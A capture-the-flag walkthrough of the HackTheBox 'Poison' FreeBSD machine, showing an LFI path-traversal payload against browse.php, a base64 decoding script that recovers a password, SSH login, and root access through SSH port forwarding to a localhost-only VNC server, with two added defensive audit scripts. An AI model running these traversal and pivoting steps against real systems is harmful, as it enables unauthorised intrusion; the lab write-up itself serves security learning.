HTB Poison Walkthrough - A Deep Dive into FreeBSD Exploitation

HackTheBox - Poison: Complete Walkthrough

Introduction

Poison represents an excellent medium-difficulty FreeBSD machine on HackTheBox that provides valuable lessons in web vulnerabilities, password cracking, and privilege escalation through local port forwarding. What makes this box particularly interesting is its departure from the typical Linux-based machines, giving us an opportunity to explore FreeBSD’s unique characteristics and security challenges.

In this comprehensive walkthrough, I’ll guide you through the entire process of compromising the Poison box, explaining each step in detail with a focus on understanding the underlying concepts and techniques. Unlike other write-ups, we’ll dig deeper into why certain approaches work and explore alternative methods where applicable.

Skills Practiced

  • Local File Inclusion (LFI) exploitation
  • Base64 decoding and password cracking
  • FreeBSD system enumeration
  • VNC session hijacking
  • SSH port forwarding techniques
  • Privilege escalation via running processes

Initial Reconnaissance

Let’s begin by gathering information about our target. First, we’ll run a comprehensive Nmap scan to identify open ports and running services:

# Initial scan
nmap -sC -sV -oA nmap/poison 10.10.10.84

# Full port scan (background)
nmap -p- -oA nmap/poison-allports 10.10.10.84 &

Here are the results from our initial scan:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
|   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_  256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Key observations:

  1. The target is running FreeBSD (not Linux)
  2. SSH service is available on port 22
  3. Web server running Apache 2.4.29 with PHP 5.6.32 on port 80

Let’s start by exploring the web server, as it often represents the largest attack surface.

Web Exploitation

Exploring the Web Interface

Navigating to http://10.10.10.84 in a browser reveals a simple PHP script listing:

The interface allows us to select and run PHP scripts from a dropdown list. This is immediately interesting as it suggests we might be able to view or execute files on the server. Such functionality often leads to Local File Inclusion (LFI) vulnerabilities.

Discovering Local File Inclusion (LFI)

Looking at the URL when selecting a script (http://10.10.10.84/browse.php?file=listfiles.php), I notice the file parameter. This is a classic entry point for LFI attacks. Let’s test this by trying to read a system file:

http://10.10.10.84/browse.php?file=../../../etc/passwd

Success! The server responds with the contents of /etc/passwd:

# $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
_ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
_tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin
messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin
avahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin
cups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin
charix:*:1001:1001:charix:/home/charix:/bin/csh

This confirms the LFI vulnerability. I’ve also identified a user account named charix that will likely be important later.
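As an added defender's counterpart to the LFI above (not part of the original write-up), the following script scans Apache access log lines for browse.php requests whose file parameter escapes the web root. The allowlist is taken from the directory listing shown on this page; the log lines and the client IP 10.10.14.5 are constructed samples.

```python
#!/usr/bin/env python3
"""Flag browse.php?file= values that traverse out of the web root."""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Scripts the page's listing shows in the web root; anything else is suspect.
ALLOWED = {"browse.php", "index.php", "info.php", "ini.php",
           "listfiles.php", "phpinfo.php", "pwdbackup.txt"}

# Apache combined log format (only the fields we need are captured).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})')

# Constructed sample log: one benign request, two traversal attempts
# (plain and percent-encoded), then two more benign lines.
SAMPLE_LOG = [
    '10.10.14.5 - - [19/Mar/2018:10:00:01 +0000] "GET /browse.php?file=listfiles.php HTTP/1.1" 200 312',
    '10.10.14.5 - - [19/Mar/2018:10:00:07 +0000] "GET /browse.php?file=../../../etc/passwd HTTP/1.1" 200 2231',
    '10.10.14.5 - - [19/Mar/2018:10:00:09 +0000] "GET /browse.php?file=%2e%2e%2f%2e%2e%2fetc%2Fpasswd HTTP/1.1" 200 2231',
    '10.10.14.5 - - [19/Mar/2018:10:00:12 +0000] "GET /browse.php?file=pwdbackup.txt HTTP/1.1" 200 780',
    '10.10.14.5 - - [19/Mar/2018:10:00:15 +0000] "GET /index.php HTTP/1.1" 200 150',
]

def decode_fully(value: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding so %252e%252e still reads as '..'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_file_param(value: str) -> str:
    """Return 'ok', 'traversal', 'absolute' or 'unlisted' for a file= value."""
    value = decode_fully(value).replace("\\", "/")
    if "\x00" in value or ".." in value.split("/"):
        return "traversal"
    if value.startswith("/"):
        return "absolute"
    return "ok" if value in ALLOWED else "unlisted"

def scan_access_log(lines):
    """Yield (client_ip, raw_value, verdict) for every suspicious browse.php hit."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("url"))
        if parts.path != "/browse.php":
            continue
        # parse_qs already performs one round of percent-decoding.
        for raw in parse_qs(parts.query, keep_blank_values=True).get("file", []):
            verdict = classify_file_param(raw)
            if verdict != "ok":
                findings.append((m.group("ip"), raw, verdict))
    return findings
```

The same allowlist check, applied server-side before the include, is the fix for browse.php itself.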

Exploring Available Files

Let’s examine the files in the web directory:

http://10.10.10.84/browse.php?file=listfiles.php

Output:

Array
(
    [0] => .
    [1] => ..
    [2] => browse.php
    [3] => index.php
    [4] => info.php
    [5] => ini.php
    [6] => listfiles.php
    [7] => phpinfo.php
    [8] => pwdbackup.txt
)

The pwdbackup.txt file looks interesting. Let’s check its contents:

http://10.10.10.84/browse.php?file=pwdbackup.txt

This reveals a multi-layered base64-encoded password:

This password is secure, it's encoded at least 13 times.. what could go wrong really..
This requires multiple rounds of base64 decoding. Let’s write a short script to handle this:

#!/usr/bin/env python3
import base64

with open('encoded.txt', 'r') as f:
    data = f.read().strip()

# Extract only the base64 content
lines = data.split('\n')
encoded = ''.join(lines[2:])  # Skip the first two lines

# Decode 13 times
for i in range(13):
    encoded = base64.b64decode(encoded).decode('utf-8')
    print(f"Iteration {i+1}: {encoded}")

print(f"\nFinal password: {encoded}")

Running this script gives us:

Final password: Charix!2#4%6&8(0

Great! We now have what appears to be the password for the user charix.

Gaining Initial Access

Let’s try to SSH into the machine using the credentials we found:

ssh [email protected]
# Enter password: Charix!2#4%6&8(0

Success! We’re now logged in as the user charix. Let’s explore the system and gather more information.

# Check the system information
uname -a
# FreeBSD Poison 11.1-RELEASE FreeBSD 11.1-RELEASE #0 r321309: Fri Jul 21 02:08:28 UTC 2017     [email protected]:/usr/obj/usr/src/sys/GENERIC  amd64

# Check user's home directory
ls -la
# total 28
# drwxr-x---  2 charix  charix  512 Mar 19  2018 .
# drwxr-xr-x  3 root    wheel   512 Mar 19  2018 ..
# -rw-r-----  1 charix  charix  166 Mar 19  2018 .cshrc
# -rw-r-----  1 charix  charix  254 Mar 19  2018 .login
# -rw-r-----  1 charix  charix  163 Mar 19  2018 .login_conf
# -rw-r-----  1 charix  charix  379 Mar 19  2018 .mail_aliases
# -rw-r-----  1 charix  charix  336 Mar 19  2018 .mailrc
# -rw-r-----  1 charix  charix  802 Mar 19  2018 .profile
# -rw-r-----  1 charix  charix    0 Mar 19  2018 .rhosts
# -rw-r-----  1 charix  charix  980 Mar 19  2018 .shrc
# -rw-r-----  1 charix  charix   33 Mar 19  2018 user.txt
# -rw-------  1 charix  charix  1.0K Mar 19  2018 secret.zip

# Get the user flag
cat user.txt
# eaacdfb2d141b72a589233063604209c

We’ve found the user flag and an interesting file called secret.zip. Let’s download this file to our local machine for further analysis:

# On our attacking machine
scp [email protected]:/home/charix/secret.zip .

Let’s try to unzip it:

unzip secret.zip
# Archive:  secret.zip
# [secret.zip] secret password: 

It’s password-protected. Let’s try the same password we used for SSH:

unzip secret.zip
# Archive:  secret.zip
# [secret.zip] secret password: Charix!2#4%6&8(0
#  extracting: secret

Great! Let’s examine the extracted file:

file secret
# secret: Non-ISO extended-ASCII text, with no line terminators

xxd secret
# 00000000: 48c7 7c52 5958 3bc4 2aa4 0e3a 2f04 4b0e  H.|RYX;.*..:/K.
# 00000010: 7a2f 44cd 85a9 1c5c b414                 z/D....\..

This appears to be a binary file rather than text. Let’s keep it for later as it might be useful for privilege escalation.

Privilege Escalation

Enumerating Running Processes

Let’s check for running processes that might lead to privilege escalation:

ps aux

Interesting output from the process list:

root   529   0.0  0.9  23620  9032 v0- I    22:55    0:00.02 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5901 -localhost -nolisten tcp :1

We can see that a VNC server is running as root on port 5901, but it’s only accessible from localhost (-localhost flag). This is a potential avenue for privilege escalation.

Port Forwarding to Access VNC

Since the VNC server is only accessible from localhost, we’ll need to use SSH port forwarding to access it:

# On our attacking machine
ssh -L 5901:127.0.0.1:5901 [email protected]

This command forwards local port 5901 on our attacking machine, through the SSH session, to 127.0.0.1:5901 as seen from the target. The VNC server therefore sees a connection arriving on its own loopback interface, which is exactly what the -localhost restriction permits.
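As an added example (not from the original write-up), the script below turns the two findings above into checks a defender can run: it parses `ps aux` lines for Xvnc processes and reports who runs them and what guards them, and it reads an sshd_config to tell whether a given user may open the local port forward that defeats a localhost-only bind. The ps lines, the sshd_config fragments and the `admin` account are constructed samples.

```python
#!/usr/bin/env python3
"""Audit a root-owned Xvnc guarded only by -localhost, and sshd forwarding rules."""
import shlex

# Constructed sample: the Xvnc line from the ps output above plus a benign shell.
SAMPLE_PS = [
    "root   529   0.0  0.9  23620  9032 v0- I    22:55    0:00.02 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5901 -localhost -nolisten tcp :1",
    "charix 716   0.0  0.3  13180  3060  0  Ss   23:01    0:00.01 -csh (csh)",
]
# Constructed sshd_config fragments: the OpenSSH default (forwarding on) and a
# hardened one that disables it except for an assumed 'admin' account.
DEFAULT_SSHD = "#AllowTcpForwarding yes\nPermitRootLogin no\n"
HARDENED_SSHD = "AllowTcpForwarding no\nMatch User admin\n    AllowTcpForwarding yes\n"

def audit_vnc(ps_lines):
    """Return one finding per Xvnc process: owner, port, bind and auth file."""
    findings = []
    for line in ps_lines:
        # BSD `ps aux`: USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
        fields = line.split(None, 10)
        argv = shlex.split(fields[10]) if len(fields) == 11 else []
        if not argv or not argv[0].endswith("Xvnc"):
            continue
        def arg_after(flag):  # value following a flag, or None if absent
            return argv[argv.index(flag) + 1] if flag in argv[:-1] else None
        findings.append({
            "pid": int(fields[1]),
            "runs_as_root": fields[0] == "root",
            "port": arg_after("-rfbport"),
            "localhost_only": "-localhost" in argv,
            "password_file": arg_after("-rfbauth"),
        })
    return findings

def forwarding_allowed(sshd_config, user):
    """True if sshd lets `user` open local forwards (OpenSSH default is yes).
    Handles the global value and `Match User` blocks; other Match criteria are
    treated as not applying to `user`."""
    global_allow, user_allow, section = True, None, "global"
    for raw in sshd_config.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        key, _, val = line.partition(" ")
        key, val = key.lower(), val.strip()
        if key == "match":
            crit = val.split()
            is_user = len(crit) >= 2 and crit[0].lower() == "user" and user in crit[1].split(",")
            section = "user" if is_user else "other"
        elif key == "allowtcpforwarding":
            allow = val.lower() in ("yes", "all", "local")
            if section == "global":
                global_allow = allow
            elif section == "user":
                user_allow = allow
    return global_allow if user_allow is None else user_allow
```

Disabling forwarding only narrows the path; the durable fix is not running the VNC session as root at all.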

Connecting to VNC Server

Now we need to determine how to authenticate to the VNC server. Remember the secret file we extracted earlier? Let’s try to use it as the VNC password file:

vncviewer -passwd secret 127.0.0.1:5901

Success! We’re now connected to a graphical desktop session running as root. We can open a terminal and access the root flag:

cat /root/root.txt
# 716d04b188419cf2bb99d891272361f5

Alternate Privilege Escalation Method

If the VNC approach doesn’t work or if you want to try a different method, we can also look for SUID binaries or other privilege escalation vectors:

find / -perm -u=s -type f 2>/dev/null

In FreeBSD, unlike Linux, SUID binaries are less commonly exploitable. However, we can explore kernel vulnerabilities or misconfigurations specific to FreeBSD.

Summary and Key Takeaways

  1. Initial Access:
    • Discovered an LFI vulnerability in the PHP web application
    • Found an encoded password in pwdbackup.txt
    • Decoded the password through 13 layers of base64 encoding
    • Used the credentials to SSH into the system as user charix
  2. Privilege Escalation:
    • Found a password-protected secret.zip file in the user’s home directory
    • Extracted a binary file that turned out to be a VNC password file
    • Discovered a VNC server running as root but only accessible from localhost
    • Used SSH port forwarding to access the VNC server
    • Connected to the VNC server using the extracted password file
    • Gained root access and captured the flag

FreeBSD vs Linux: Important Differences

Working with FreeBSD in this challenge highlighted several key differences from Linux:

  1. Directory Structure: FreeBSD uses a slightly different directory structure compared to Linux.
  2. Package Management: FreeBSD uses pkg instead of apt or yum.
  3. Shell: The default shell in FreeBSD is csh rather than bash.
  4. Process Listing: The output format of ps is slightly different.
  5. Default Utilities: Some common Linux utilities have different flags or behavior in FreeBSD.

Learning Resources

For those interested in deepening their understanding of the techniques used in this box, here are some valuable resources:

  1. Local File Inclusion (LFI):
  2. FreeBSD Security:
  3. VNC Security:
  4. SSH Port Forwarding:

Conclusion

Poison was an excellent medium-difficulty box that challenged us to exploit a web vulnerability, decode encoded credentials, and leverage port forwarding to access restricted services. The use of FreeBSD instead of Linux added an interesting twist, requiring us to adapt our usual techniques.

The most important lesson from this box is the danger of running privileged services that are only protected by network-level restrictions (localhost binding) rather than strong authentication mechanisms. Even though the VNC server was configured to only accept connections from localhost, SSH port forwarding let us reach it anyway: the forwarded connection originates on the target itself, so the loopback-only binding was satisfied. Any user with an SSH login and TCP forwarding enabled (the OpenSSH default) effectively shares the target’s loopback network.

This box also demonstrates the importance of proper password management. The user’s password was stored in an encoded format that provided a false sense of security, and the same password was reused for multiple purposes (SSH and zip file encryption).

I hope this walkthrough has been helpful and educational. Happy hacking!

This post is licensed under CC BY 4.0 by the author.